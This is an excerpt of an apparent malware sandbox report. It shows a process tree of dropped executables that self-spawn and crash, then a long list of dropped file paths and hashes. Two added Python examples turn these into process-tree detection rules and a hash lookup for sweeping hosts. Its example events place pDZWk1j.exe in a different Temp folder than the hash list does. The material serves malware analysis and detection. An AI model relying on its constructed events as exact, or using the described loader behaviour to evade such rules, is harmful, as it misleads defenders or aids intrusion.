                                    • Executes dropped EXE
                                    PID:3644
                                  • C:\Users\Admin\AppData\Roaming\98JWpiisq2.exe
                                    "C:\Users\Admin\AppData\Roaming\98JWpiisq2.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3660
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 3660 -s 776
                                      9⤵
                                        PID:3328
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 512
                                    7⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3584
                                • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:2736
                                  • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:1596
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 500
                                    7⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3112
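The subtree above shows a repeated shape: a dropped executable (pDZWk1j.exe, then mAtJWNv.exe) is launched from a numbered Temp\<digits>\ folder, spawns a second copy of itself while the sandbox flags "Suspicious use of SetThreadContext", and the original copy then crashes into WerFault.exe (-p 3452, -p 2736). The same self-spawn is also visible for 98JWpiisq2.exe's parent chain, and WerFault reports on 3660 too. As an added example, not output of the sandbox, the Python below turns those three shapes into detections and runs them over process-creation events constructed from the tree: PIDs, image paths and WerFault arguments are copied from it, parents the excerpt does not show (the launcher of pDZWk1j.exe and mAtJWNv.exe, the parent of firefox.exe 1400) get the placeholder ppid 1, the Firefox content-process arguments are abbreviated, and the Firefox events serve as a control for a browser that legitimately spawns copies of itself.

```python
"""Three process-tree detections modelled on the sandbox tree above.
Added example; the events are constructed, not sandbox output."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Locations a dropper can write to without elevation.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)
# Numbered per-payload download folders, e.g. ...\Temp\10104970101\pDZWk1j.exe
NUMBERED_DROP_DIR = re.compile(r"\\AppData\\Local\\Temp\\\d{8,}\\", re.IGNORECASE)
# WerFault.exe -u -p <crashed pid> -s <event handle>
WERFAULT_PID = re.compile(r"\bWerFault\.exe\b.*?\s-p\s+(\d+)", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def ev(pid: int, ppid: int, image: str, args: str = "") -> ProcEvent:
    """Build an event whose command line is the quoted image plus args."""
    return ProcEvent(pid, ppid, image, f'"{image}"{args}')


TEMP = r"C:\Users\Admin\AppData\Local\Temp"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
WERFAULT32 = r"C:\Windows\SysWOW64\WerFault.exe"
WERFAULT64 = r"C:\Windows\system32\WerFault.exe"

# Constructed from the tree above; ppid 1 marks parents the excerpt omits.
EVENTS = [
    ev(1400, 1, FIREFOX),
    ev(628, 1400, FIREFOX, " -contentproc -childID 1 -isForBrowser"),
    ev(3452, 1, TEMP + r"\10104970101\pDZWk1j.exe"),
    ev(3512, 3452, TEMP + r"\10104970101\pDZWk1j.exe"),
    ev(3520, 3452, TEMP + r"\10104970101\pDZWk1j.exe"),
    ev(3644, 3520, r"C:\Users\Admin\AppData\Roaming\zTtfgzgam0.exe"),
    ev(3660, 3520, r"C:\Users\Admin\AppData\Roaming\98JWpiisq2.exe"),
    ProcEvent(3328, 3660, WERFAULT64, WERFAULT64 + " -u -p 3660 -s 776"),
    ProcEvent(3584, 3452, WERFAULT32, WERFAULT32 + " -u -p 3452 -s 512"),
    ev(2736, 1, TEMP + r"\10104980101\mAtJWNv.exe"),
    ev(1596, 2736, TEMP + r"\10104980101\mAtJWNv.exe"),
    ProcEvent(3112, 2736, WERFAULT32, WERFAULT32 + " -u -p 2736 -s 500"),
]


def detect(events: list[ProcEvent]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, image) for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    findings: list[tuple[str, int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        writable = bool(USER_WRITABLE.search(e.image))
        # 1. A binary in a user-writable path spawning a copy of itself:
        #    the hollowing / RunPE shape behind "SetThreadContext".
        #    Browsers self-spawn too, hence the path requirement.
        if parent and parent.image.lower() == e.image.lower() and writable:
            findings.append(("self_spawn_user_writable", e.pid, e.image))
        # 2. Execution out of Temp\<digits>\, the numbered download folders
        #    every payload in this report was dropped into.
        if NUMBERED_DROP_DIR.search(e.image):
            findings.append(("numbered_temp_drop_dir", e.pid, e.image))
        # 3. WerFault handling a crash of a user-writable binary: a dropped
        #    payload died, in this tree right after a self-spawn attempt.
        m = WERFAULT_PID.search(e.cmdline)
        if m:
            crashed = by_pid.get(int(m.group(1)))
            if crashed and USER_WRITABLE.search(crashed.image):
                findings.append(("werfault_on_dropped_exe", crashed.pid, crashed.image))
    return findings


def pids_by_rule(findings: list[tuple[str, int, str]]) -> dict[str, set[int]]:
    """Group finding PIDs by rule name."""
    out: dict[str, set[int]] = {}
    for rule, pid, _ in findings:
        out.setdefault(rule, set()).add(pid)
    return out


if __name__ == "__main__":
    for rule, pid, image in detect(EVENTS):
        print(f"{rule:26} pid={pid:<5} {image}")
```

Rule 1 fires for 3512, 3520 and 1596 but not for the Firefox content process, rule 2 for every pDZWk1j.exe / mAtJWNv.exe instance, and rule 3 for the three WerFault invocations; on real telemetry (Sysmon event 1 or equivalent) the same three rules can be joined on ProcessId/ParentProcessId exactly as here.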

                      Network

                      MITRE ATT&CK Enterprise v15


                      Downloads
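Each entry in this list gives a path, a size and four digests, one token per line; memory dumps carry a size only. As an added example that is not part of the sandbox report, the Python below parses entries in that shape (and the one-line "Key value" shape as well, an assumption of the example) into records and indexes them by SHA-256 so files found on a host can be checked against the list. The embedded sample is copied from three entries below; the 1-byte service[1].htm entry carries the digests of the single ASCII character "0", which the lookup exercises.

```python
"""Parse sandbox 'Downloads' entries and look files up by SHA-256.
Added example; SAMPLE is constructed from entries of the report."""
from __future__ import annotations

import hashlib

KEYS = ("Filesize", "MD5", "SHA1", "SHA256", "SHA512")

# Three entries copied from the list: a dropped script, the 1-byte IE cache
# file, and a memory dump (size only). The first uses the page's
# value-on-next-line layout, the others the one-line layout.
SAMPLE = r"""
• C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd

  Filesize

  1KB

  MD5

  cedac8d9ac1fbd8d4cfc76ebe20d37f9

  SHA1

  b0db8b540841091f32a91fd8b7abcd81d9632802

  SHA256

  5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

  SHA512

  ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

• C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\service[1].htm
  Filesize 1B
  MD5 cfcd208495d565ef66e7dff9f98764da
  SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
  SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
  SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

• memory/644-243-0x0000000010000000-0x000000001001C000-memory.dmp
  Filesize 112KB
"""


def parse_downloads(text: str) -> list[dict[str, str]]:
    """One dict per bullet entry: 'path' plus whichever KEYS are present."""
    entries: list[dict[str, str]] = []
    pending: str | None = None  # key whose value is on the next non-empty line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            entries.append({"path": line[1:].strip()})
            pending = None
            continue
        if not entries:
            continue  # prose before the first bullet
        cur = entries[-1]
        if pending is not None:
            cur[pending] = line
            pending = None
        elif line in KEYS:
            pending = line
        else:
            key, _, value = line.partition(" ")
            if key in KEYS and value.strip():
                cur[key] = value.strip()
    return entries


def parse_size(size: str) -> int:
    """'46KB' -> 47104. Report sizes are rounded, so treat this as approximate."""
    units = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
    num = size.rstrip("BKMG")
    unit = size[len(num):] or "B"
    return int(float(num) * units[unit])


def sha256_index(entries: list[dict[str, str]]) -> dict[str, dict[str, str]]:
    """SHA-256 -> entry; memory dumps have no digests and are skipped."""
    return {e["SHA256"].lower(): e for e in entries if "SHA256" in e}


def lookup(data: bytes, index: dict[str, dict[str, str]]) -> dict[str, str] | None:
    """Return the entry whose SHA-256 matches `data`, or None."""
    return index.get(hashlib.sha256(data).hexdigest())


def sha256_of_file(path: str) -> str:
    """Stream a file through SHA-256 (payloads here reach 30 MB)."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


if __name__ == "__main__":
    idx = sha256_index(parse_downloads(SAMPLE))
    hit = lookup(b"0", idx)
    print(hit["path"] if hit else "no match")
```

To sweep a host, feed the full Downloads text to parse_downloads, then compare sha256_of_file() of suspect files (the Temp\<digits>\ folders and AppData\Roaming are the places this report populates) against the index.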

• C:\ProgramData\C119990BFD470039.dat
  Filesize 46KB
  MD5 02d2c46697e3714e49f46b680b9a6b83
  SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
  SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
  SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

• C:\Temp\BvIzlcQOD.hta
  Filesize 779B
  MD5 39c8cd50176057af3728802964f92d49
  SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
  SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
  SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  Filesize 71KB
  MD5 83142242e97b8953c386f988aa694e4a
  SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
  SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
  SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

• C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\soft[1]
  Filesize 987KB
  MD5 f49d1aaae28b92052e997480c504aa3b
  SHA1 a422f6403847405cee6068f3394bb151d8591fb5
  SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
  SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

• C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\service[1].htm
  Filesize 1B
  MD5 cfcd208495d565ef66e7dff9f98764da
  SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
  SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
  SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

• C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp
  Filesize 26KB
  MD5 2844ca306c5d853185550573f27f26f3
  SHA1 a26e4d4e08b690f25c9f179f085422f77eded972
  SHA256 f46aeb507bb18a6d792137f7fb96b327a8bcbc7191679fda24aab70d4ee2d324
  SHA512 7eb38395bebaa4411807b91cd826483254c171b0d3c3a816ed2554ee4f5d00d45d9d8f241d2c495a8fb3e0f1113e4a34958f97e8bb45c318794f18caf7ef428e

• C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
  Filesize 15KB
  MD5 96c542dec016d9ec1ecc4dddfcbaac66
  SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
  SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
  SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

• C:\Users\Admin\AppData\Local\Temp\10104610101\25a04a2d7b.exe
  Filesize 938KB
  MD5 b94f9347051a717bd369cee684b7eb6f
  SHA1 a0dc3fecc0cb6d49ac3dfec4a7a906e98f74eb63
  SHA256 d0a694d2cff80fa6c782801d761f9d5ab6fb458b0b8e9b87eef548914f716177
  SHA512 43a46c6747d5db0573bd8c2705ceb52bb7c4e9e6e49d85c3dada9864648be84cc4d7e2cf0908463a58dab6742ce2155eca7e7cdf1a070f04cca497adfda2206a

• C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd
  Filesize 1KB
  MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
  SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
  SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
  SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

• C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
  Filesize 712KB
  MD5 222ca959c06f62e99567723d7a0b82c2
  SHA1 7bedfc54b4480250463716b19cc9842ad18adfc5
  SHA256 ceee1236c696b7bf0710c5a11021d3c99f11a47895ff29613baf2f3f4e6b933b
  SHA512 0b68f8e0781b1d0ca16e8800e7ba9eee4c35079734f11f91e37e457edad36185e84fbce4f1ca9d498d0d199d6f1e6ede28173882095de5f0378a4bb1f3d616e1

• C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe
  Filesize 3.7MB
  MD5 4769a99eadbd516c17b7f4c541b87003
  SHA1 cfe5a9970182cf428919e9f110a63df37d0eee06
  SHA256 446ee955b11dbd350c8d44825c88d7846cf6c88c1604b1908739b2ec8b1cfc3e
  SHA512 36146efedbf0780bc6fe459f5c649549b79e79c3908593cc1471f6ed2bd79e1348353d2861a48364aaa86dd5c1a59f7d874811c4c5bcc843e459230c7afb0a91

• C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe
  Filesize 445KB
  MD5 c83ea72877981be2d651f27b0b56efec
  SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
  SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
  SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

• C:\Users\Admin\AppData\Local\Temp\10104870101\e81eff42e0.exe
  Filesize 4.5MB
  MD5 96dd38daadfd80cf699a8c087b581ab9
  SHA1 ccea87fbad5d9fdea11ecedfd7f3d0b2d2ff3b2c
  SHA256 ad659d3cd67b4c566ada6bc6dfbeece67e5b1941585fbc480bdd80daf290a110
  SHA512 9862debc204be49700c1025ab9556a2b082890fae9e43ec9b7c7d41ed1db801601e48b51c755679b4035a4af7019b159451bc356769bd432b1173c15a10423ab

• C:\Users\Admin\AppData\Local\Temp\10104880101\fc259c3d14.exe
  Filesize 1.8MB
  MD5 bde9a6abcb6323c95e4912af1dec9174
  SHA1 d732600d2bd0c05fbe4eb5e0f5320e1b45e7cc6a
  SHA256 c374a12d72f69efe4f1df4b8a40efdf0b3a3ff7c82d1e6f246ed32181701f699
  SHA512 dc4005df7bac77f96941b632a3cf18ace120b0b70a8d0749e5d657ac8f19fe4864bb9dc93e6c96dd06ce7036c7cf9fcb66cd56516a73d75992c2f17a53a2e2c3

• C:\Users\Admin\AppData\Local\Temp\10104890101\23401e2b1c.exe
  Filesize 3.0MB
  MD5 54b30d5072b09ae0b55ca89c3d6cea5f
  SHA1 22459531f94d2c64f9adf316a4aa1e2c63ef8fe5
  SHA256 4b2bb17bfd3ec355a70605cb5a1971d098ccd1f92f0a47386e9166b223bb551f
  SHA512 5bdba7bc41d20c515bd58fcb7ceb67feadbd582c4ffeec426e1e370d105dde08c9d7f6ecf362066accc03bd80ebe94ccea7ad284d0e622e449dfe0d77272ff5c

• C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
  Filesize 48KB
  MD5 d39df45e0030e02f7e5035386244a523
  SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
  SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
  SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

• C:\Users\Admin\AppData\Local\Temp\10104920101\7c161f386c.exe
  Filesize 3.0MB
  MD5 3d020a1f3a39cbf3cc5388fc44c98d0e
  SHA1 ca89df7cf0e6624d22885bd5caa4a952e9cf0c08
  SHA256 e5fec111044aa2eb782e39a5332e067cf911a6fa1fe55eaaa446df1a0d5655b7
  SHA512 b3a68853b082eeda17ef41b9c1763d487f778967d348a3de8c47a81d9550fcbbaffaec8e584d3b661d815abd653d5d5b27fdf7879dc061b7c22d164a2cfd7300

• C:\Users\Admin\AppData\Local\Temp\10104930101\590fcbc813.exe
  Filesize 1.7MB
  MD5 78dd1277431fc66e855e72022c860e27
  SHA1 0bba63575a0912d00e91963f2b77303f30861978
  SHA256 ab15b22d550865e2bf810c040cc4ec118c9c161cc7ab74d597fda7a31873f17c
  SHA512 37af33de6d0410d68aaffe17ee01c83793e6f6be0bb87b63af3be98951fca4bb518241244d0c6d6181ca5c9a024c97e8ad6076173150d3e968fea600a7bd29a1

• C:\Users\Admin\AppData\Local\Temp\10104940101\63af54f7b0.exe
  Filesize 949KB
  MD5 593a33280543acef8878ad91a3cdcee2
  SHA1 00cf7c13ae63fbe16847ebbad71f4baf0a266c5e
  SHA256 1a9ebb0cb706ac093e516c09b3bcce07ff9cc4f6291564788105e66b0561f563
  SHA512 5645dd4c6edbb759f9332fd60d20731b7faecc7e8dadaa7ef078f4dd0cc9dbd39a81b276a2b916bc9240b97fe224a6d0b77cf4674c3f2ac9f30d8e00d5912c56

• C:\Users\Admin\AppData\Local\Temp\10104950101\90076af2a4.exe
  Filesize 1.7MB
  MD5 98ee4896338ef74dab5e7c33ddcc9351
  SHA1 25d21fc6a6a559d3c669eae75cc4a5472ed7af77
  SHA256 96c7ccf3d949db0cc6d64ebaa6133a8dd21cd3931c4b72e2ba4e15584bdebfa1
  SHA512 f67f2fac33be4e9cae733131ab4d5c14c51bdc40f27ab2017ae66c3f7970bf81556e037ecdf73df0fe457f19dedfc87670839c25bb88ddeaadada1a22e13c48b

• C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
  Filesize 30.4MB
  MD5 158f22bd8c5c1c37f7ecd4ea7ffed06d
  SHA1 8f25c9a5e8204ad7bba72750cab8a896425ef01a
  SHA256 624c9457f49d82a1f167f00529665259cdcc30ac7995eb8dd36e23cf5cfd2510
  SHA512 2639510edb67caecb57f0cc6fadc72af7d409c84c4d8cc740dc0b8dfc5c682d6c4e8a79db2b279b69d436fee278262b97495588c3130b44362d8c425f4b13a9d

• C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
  Filesize 350KB
  MD5 b60779fb424958088a559fdfd6f535c2
  SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
  SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
  SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

• C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta
  Filesize 717B
  MD5 4cf3b20e5dd686deb4fb105779e3632e
  SHA1 2083eb98fe184ca88f3004d27a03bcf72b69f11b
  SHA256 96dd1ad96f89199f6643eebb824e5053bddb413449b7d729981d1193c43e9bd8
  SHA512 67acc41c07d22080fbfb4fe6c132f29fa39a2f911ec2097ae68314eb72bbb77123178e3cc24503875ee7bf1d08fec8cf6855e5be540555b0ecc0b596656f68fd

• C:\Users\Admin\AppData\Local\Temp\TarB40A.tmp
  Filesize 183KB
  MD5 109cab5505f5e065b63d01361467a83b
  SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
  SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
  SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

• C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta
  Filesize 717B
  MD5 ed966743807d835ed68bd2f8f68ee4db
  SHA1 92878cfec23ba1feb0538724d734326b5d32d2e6
  SHA256 cda02a5800132116e62ce2a4c310366c3b55fd904cb073d1601fc232f18e3c52
  SHA512 9861ac97d83b8f6ad1bec24dd4f299195df8c1c7827ce38011d9f22691d38ff61a6bf448a4584f629079d97aaaf8d42c7506102f9e835ee36bd05fe68b1c0bf0

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize 7KB
  MD5 f36129b04b7b8fabfa4d716b6317e40e
  SHA1 0039712c325f61c7fd15570ebe0b49eb69d416f4
  SHA256 828b423c53ab7839f74e0c0e0d265a1ea2bc38b9c10e62707b3c76f2bb71a266
  SHA512 63dfb423b76f208dd3713ba78a55a62cd99f71eed1809a0f6a6cc2c22d1a808d9e374bd2c2d74cbc86effabb418ba34d03400d37d96854ce12c77ad2de090b32

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
  Filesize 2KB
  MD5 abe12f763e5178d48e3bc1ecf407b02f
  SHA1 d0ffc376143badb4fb51b823e079f1d7ade01b77
  SHA256 3bc24dd97802514691ff04d935454614efc49f5ab67a5381d816ce3716ab5f3e
  SHA512 2e5d581df8c51e915ed680f24eef3593d55bb413e33e43fb2f6174d4a1fc42d244d1ee614782d7f82f273a882579fcfc1f6f824b2726e6f1c33a09114717b38b

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
  Filesize 2KB
  MD5 6bf93c0399178c9cc0572d2e0c275f7c
  SHA1 f5e878346bdef5ba1befa762c86c447c5346af53
  SHA256 c06c7ef26c504362850d34e8386e06e689d01cd8ec7fe467ea3e91ee7c4ebffe
  SHA512 7c065aad9a2a54712e931547728362a2691e31af6d6a0fe178a12c321ec85ed4c1771bf0d3288cc5bbe6bba8515cdb6be3a35c61a2e364901dba28c0aff2c661

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\af4d1448-8f8e-4fda-bd56-7206d82c3163
  Filesize 745B
  MD5 0b0a3a36057789a5fb9081d18b9817d9
  SHA1 e8948d7b2778949e59d84d4bff48a1712f04de09
  SHA256 b91e0c31466e4d44ae7d651993a410278967cc424cd75139deced11bdf08cdbf
  SHA512 2c1944eb41a5f488add97842963c9877484c3e1e736858fd2c5eca4089777d2f0a8945536b3d83d80fad1c2607feeacf44665c6ec69e6715fae3fbd2ca26fc43

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\b5c848f3-2152-4039-827f-54f69b1a3171
  Filesize 11KB
  MD5 f2fd72f04fdcb70349112f54c6b6d693
  SHA1 2084a892ff7c7c5729fb9376503ea6a08416c930
  SHA256 e34168d716f17f451ea6bd37ff8d2b5754c6059e79f3b01bbb641c647f84bfa2
  SHA512 e8f3ac37d1d098e0f313293a0faa08d8938be63dc5cd88801f14ad8214c95aef14c3d2b57443352372422205b3a5c0fe52b75f4e52d87a70196644e497c131a2

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\favicons.sqlite-wal
  Filesize 160KB
  MD5 2a21131b32440e596f261c7f97d2fc8f
  SHA1 c77a2cc72198a243b47cf85bc29b52d03b8b6f1b
  SHA256 c0bad2344adde380ec651bde0ff95d8a5eaeceae5ab0cab73fa26cc75c3e8730
  SHA512 cefbb9ac2c8d8f5217dd29e50613573b617248c1d9eae9d0a0041509aad2965c8f042e1d0aad63ddc169acabf0dc18b38567002e4be1af47a9edbb400e051947

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\places.sqlite-wal
  Filesize 1.4MB
  MD5 ec35707682248a7033d1c4ae2f39640c
  SHA1 58ed395c900bc3169bc99dea62d5cc0408dc955a
  SHA256 f1b44518a41aca27408827a3d27c04789a22300f524f4376fba2e8055ded41fc
  SHA512 d67741fce58bae1be72716824c3981c4a01f48587cb4dbf63590db98db57428d796f8f908aa3772c44438bb3ffa9e6c4bb9923e3b3bf9b9ec6586b7db1840be5

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js
  Filesize 6KB
  MD5 227046c9f51844db412e966792d5dd46
  SHA1 c2c8f7890c65f9cb409c3c501d7bc6de1379abc1
  SHA256 df4d06f47e177f7440c1178dd0fb401ae7c32e16ef91f8dc4e5e689aa0d33eea
  SHA512 3b4cecc6401b0d5ef1fbf9e08197e60556ff9b921f13119f0fe780a7be7d4d4098b4b06b2e112cafb6c2d543800c133906cbcb020e3c87c6fa8e8743388a78a5

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js
  Filesize 6KB
  MD5 44c3b2e9dcefc30bb88a79184c4ffeea
  SHA1 4b2efa3d61cf189a3e7ad913744b941c5e1da42a
  SHA256 44c89c60aee1748f28a1623f6c0db35d926ca62d6d841a8264bb836a1ff81c62
  SHA512 bd8b0f4296aa0a8d3e3805448aa251b7931f5459802c811c4f187958069eb415e2b270a9d0c62bd6b2b6347e1fa62e1073a151a6596137d3521e80b3031311bb

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js
  Filesize 6KB
  MD5 6735aa70bff10709aca8527aa87f79f2
  SHA1 565dc8bbf7a7ccf58a589ef27ff8edeef733d78f
  SHA256 824245b586f005da41c71143525c68c3f5a11f81ed01eccf941d5690cb5031b9
  SHA512 462a99a91a222beb0890fccb135d15d1c97dcc54e5df1f2c499499c427781df2babd309ee5775243cc7f921984f973babf2068582dc3aec510c5be6118f1aca7

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4
  Filesize 4KB
  MD5 d4cbe3ccb150171f6ee040fcd4576e8e
  SHA1 7994fbbaa786273cc7e77c28f80954e49499c086
  SHA256 f976555c20530c70465f6f26771cecb46039f49ae9c48cab632d13a3bfd8b9a7
  SHA512 4e943d4224e18c2d486855c6595d75f1979aff1902d16f33b5dccc3b6520c8f4ee8a484198b30f78cf3f127d382a32dfb1fa7449362bed27f9f697a2c4516a48

• C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe
  Filesize 18KB
  MD5 f3edff85de5fd002692d54a04bcb1c09
  SHA1 4c844c5b0ee7cb230c9c28290d079143e00cb216
  SHA256 caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131
  SHA512 531d920e2567f58e8169afc786637c1a0f7b9b5c27b27b5f0eddbfc3e00cecd7bea597e34061d836647c5f8c7757f2fe02952a9793344e21b39ddd4bf7985f9d

• \Users\Admin\AppData\Local\TempN0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE
  Filesize 1.8MB
  MD5 23d6a88e50671a2d79a5fec5da38c672
  SHA1 d6ef750dab0728778055b3807473115b3c779862
  SHA256 aff49262b1924db1dc4c875a41f382c1a8266350ebb044d61692f9f73a558cdd
  SHA512 4d7e55454ff0915b829bdba9708a7c05c702fb6e2615a8e6a20b529be2aab5b2b9c6ee0f8ceed128a741717178b3c870e259054d877d382591ee3907aa69c560

• \Users\Admin\AppData\Roaming\udorB5ZSMp.exe
  Filesize 138KB
  MD5 137e3a65922a769e161f6241fc4800a5
  SHA1 4260d6197fff6a2816363f66d4782a3e14c2c8f4
  SHA256 4a7e9eb31388ea24cf203e005dfaf80be2fb2c8160d5fb0c3038ad553d27756c
